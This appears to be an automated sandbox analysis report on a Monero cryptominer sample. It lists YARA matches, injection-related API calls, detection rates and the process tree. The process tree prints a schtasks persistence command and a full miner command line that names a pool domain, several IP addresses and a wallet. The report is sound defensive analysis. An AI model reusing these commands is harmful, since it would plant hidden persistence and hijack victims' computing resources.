              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFE106
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFE4D6
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFE90E
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFD4D2
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFED6A
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_00007FFA36125E22
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_00007FFA36125076
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FE4D6
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FE106
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FE90E
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FD4D2
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FED6A
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA36149B74
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA361467BC
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA36145E22
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA36145076
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA36144B79
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FE4D6
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FE106
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FE90E
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FD4D2
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FED6A
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00401D58 NtAllocateVirtualMemory,
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00401D18 NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_004019D8 NtCreateThreadEx,
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00401D98 NtProtectVirtualMemory,
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00401C98 NtClose,
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA3614A30E NtUnmapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00401D58 NtAllocateVirtualMemory,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00401D18 NtWriteVirtualMemory,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_004019D8 NtCreateThreadEx,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00401D98 NtProtectVirtualMemory,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00401C98 NtClose,
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: pcNCraWcRk.exeVirustotal: Detection: 64%
              Source: pcNCraWcRk.exeMetadefender: Detection: 31%
              Source: pcNCraWcRk.exeReversingLabs: Detection: 81%
              Source: pcNCraWcRk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\pcNCraWcRk.exe 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
